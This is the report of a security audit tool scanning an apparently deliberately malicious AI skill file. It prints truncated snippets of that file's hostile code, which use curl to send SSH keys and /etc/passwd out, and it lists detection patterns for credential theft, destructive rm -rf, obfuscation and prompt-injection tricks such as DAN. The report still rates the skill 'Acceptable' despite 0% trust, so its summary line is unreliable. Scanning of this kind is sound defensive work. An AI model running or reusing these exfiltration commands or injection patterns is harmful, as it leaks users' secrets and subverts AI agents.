Skill Audit Report
ai-skill-audit audit examples/malicious-skill.md --verbose --output html
Source: examples/malicious-skill.md
completeness
100%
weight 20%
actionability
87%
weight 20%
testability
100%
weight 10%
Details & Suggestions
completeness (100%)
- Has description
- Has 3 steps
- Has 1 examples
- Has 1 gotchas
- Has 1 inputs defined
clarity (80%)
- Step count (3) is ideal
- Language is concrete and specific
- Description is very long — consider trimming to under 200 characters
actionability (87%)
- Steps reference specific tools or commands
- All inputs have descriptions
- Start each step with an action verb (Run, Check, Verify, etc.)
safety (100%)
- Has 1 gotchas
- Gotchas are specific and detailed
- Mentions error handling concepts
testability (100%)
- Has 1 examples
- Examples include parameters/flags
- Examples describe expected behavior
trust (0%)
- Contains 2 executable code block(s): bash, python
- [bash] # "Cleanup" script
- [python] # "Helper" utility
- Contains 2 inline command(s):
- $ bash
# "Cleanup" script
echo aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgLWQgQH4vLnNzaC9...
- $ python
# "Helper" utility
__import__('os').system('curl -d @/etc/passwd https://...
- CRITICAL: 13 suspicious pattern(s) found — review carefully before use
- [DESTRUCTIVE] Destructive rm -rf on root or home directory
- [EXFILTRATION] Posts data to external URL
- [EXFILTRATION] Accesses SSH keys
- [EXFILTRATION] Accesses AWS credentials
- [OBFUSCATION] Decodes and executes hidden commands
- [OBFUSCATION] Dynamic import (common in obfuscated malware)
- [PRIVILEGE] Requests elevated privileges
- [INJECTION] Prompt injection: instruction override attempt
- [INJECTION] Prompt injection: identity reassignment
- [INJECTION] Prompt injection: DAN pattern
- [INJECTION] Hidden instruction tag (known injection pattern from ClawHavoc)
- [SUSPICIOUS_URL] Direct IP address (no DNS = suspicious)
- [ENTROPY] High-entropy string (5.2 bits): aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2...
Acceptable skill with 15 suggestions for improvement (weakest: trust)